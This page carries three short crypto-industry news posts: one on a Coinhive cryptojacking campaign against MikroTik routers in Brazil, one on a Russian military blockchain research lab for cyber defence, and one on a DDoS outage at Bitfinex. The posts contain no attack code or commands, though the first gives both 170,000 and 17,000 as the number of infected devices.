Posted on

Attacker Installs Crypto Mining Malware on Over 170,000 Devices

More than 170,000 devices in Brazil were targeted in a cryptojacking attack last month.

According to a blog post published by security firm Trustwave, a wide-scale cyberattack was launched on MicroTik routers late last month. The effort led to the installation of the Coinhive mining software in a “mass” infection of more than 17,000 devices.

Trustwave security researcher Simon Kenin wrote that all of the devices used “the same sitekey,” indicating that one entity reaped the mined tokens from all of the devices.

He wrote:

“This attack may currently be prevalent in Brazil, but during the final stages of writing this blog, I also noticed other geo-locations being affected as well, so I believe this attack is intended to be on a global scale.”

According to a previous post by Trustwave, also co-authored by Kenin, Coinhive gained traction in 2017 as a service that claimed to provide monetizing solutions for websites without using any advertisements. Instead, site owners were to embed JavaScript code that would take hold of the central processing unit (CPU) power of site visitors to mine the cryptocurrency monero.

However, mining reportedly ended up costing site visitors up to 99 percent of their CPU processing power, leading to further issues for consumers as their devices generated more heat and used up large amounts of electricity.

Trustwave has since released a detection tool to block the mining malware, and as Kenin explains in his most recent post, readers should heed his “warning call” and patch any MikroTik devices “as soon as possible,” emphasizing that the severity of the attacks could reach “hundreds of thousands” of consumers around the globe.

Kenin also reports that illicit cryptocurrency mining operations such as these are “a trend we’ve been seeing a lot of over the last three years, as attackers shift from ransomware into the world of miners.”

Such sentiments are being echoed by other cybersecurity firms such as Skybox Security which also reported in their 2018 mid-year update that among cybercriminals, crypto mining now accounted for 32 percent of all cyberattacks, with ransomware making up 8 percent.

Typing image via Shutterstock

The leader in blockchain news, CoinDesk is a media outlet that strives for the highest journalistic standards and abides by a strict set of editorial policies. CoinDesk is an independent operating subsidiary of Digital Currency Group, which invests in cryptocurrencies and blockchain startups.

Posted on

The Russian Military Is Building a Blockchain Research Lab

The Russian Ministry of Defense is launching a research lab to analyze how blockchain technology can be used to mitigate cybersecurity attacks, a local newspaper reported Friday.

The nation’s military technology accelerator, referred to as the ERA, is launching a special scientific lab to determine whether blockchain technology can be used to identify cyber attacks and protect critical infrastructure, according to Russian daily Izvestia.

The newspaper reported that research has already begun to explore possible applications for blockchain technology, though the lab itself is still being developed.

One of the priorities at ERA is the development of an intelligent system to detect and prevent cyber attacks on critical information. To that end, the organization has formed a team of information security specialists.

Alexei Malanov, an antivirus expert at Kaspersky Lab, a cybersecurity firm based in Moscow, told the newspaper that blockchain-based platforms can make it more difficult to hide traces of cyber attacks.

He explained that online intruders often clean up access logs on devices to hide traces of unauthorized access to the device. But, by using a distributed ledger, the risk of this happening is minimized.

German Klimenko, a former technology advisor to Russian President Vladimir Putin similarly said that work on blockchain studies has been “useful” for the cybersecurity industry in the nation.

The lab, which is being built in the Russian coastal town of Anapa, will ultimately fall under the General Staff of the Armed Forces of the Russian Federation’s Eighth Directorate, which likewise focuses on information security.

Russian flag image via Shutterstock

The leader in blockchain news, CoinDesk is a media outlet that strives for the highest journalistic standards and abides by a strict set of editorial policies. CoinDesk is an independent operating subsidiary of Digital Currency Group, which invests in cryptocurrencies and blockchain startups.

Posted on

Bitfinex Recovers from Cyber Attack to Resume Trading

The world’s fourth largest crypto exchange by trade volume, Bitfinex, suffered a cyber-attack yesterday that halted services and prevented trading temporarily.

The Hong Kong headquartered exchange, which has handled $430 million in trade in the past 24 hours according to, went offline for a few hours with what it determined as unscheduled maintenance.  It was subsequently revealed that the servers were the target of a distributed denial of service (DDoS) attack which overloaded them with spurious traffic causing the website and trading platform to shut down temporarily.

The status monitoring systems for Bitfinex reported that;

“The cause of the outage has been identified. A DDoS attack was launched soon after we restarted operations. The previous outage was caused by issues with one of our infrastructure providers. While the platform was recovering, the attack caused extreme load on the servers. We are adjusting the DDoS protection measures to fend off the attack and be able to relaunch.”

These types of attack are not designed to steal currency but to disrupt services. Bitfinex quickly recovered from the incursion and trading resumed within a couple of hours;

Traders and investors had every reason to be concerned since Bitfinex lost almost 120,000 Bitcoins to hackers back in 2016. In June 2017 the exchange also reported being the victim of cyber-attacks so it is quite familiar with them.

The ongoing saga with Tether is also a cause for concern with Bitfinex and those that use the platform. There have been fears that the company would close due to links with USDT and an ongoing investigation by the Commodities Futures Trading Commission which subpoenaed the exchange in January. Since then the exchange has been operating as normal even though it still holds the largest amount of Tether which is currently responsible for over 17% of all Bitcoin volumes.

Security is a major headache for exchanges which are now the modern version of a bank, which of course can be robbed. Several have fallen victim this year with the largest hack being Coincheck at the beginning of the year.

The advice is always the same; do not hold any significant amount of crypto on exchanges no matter how safe you think they are. Wallets and cold storage are far safer alternatives however even they are not completely infallible.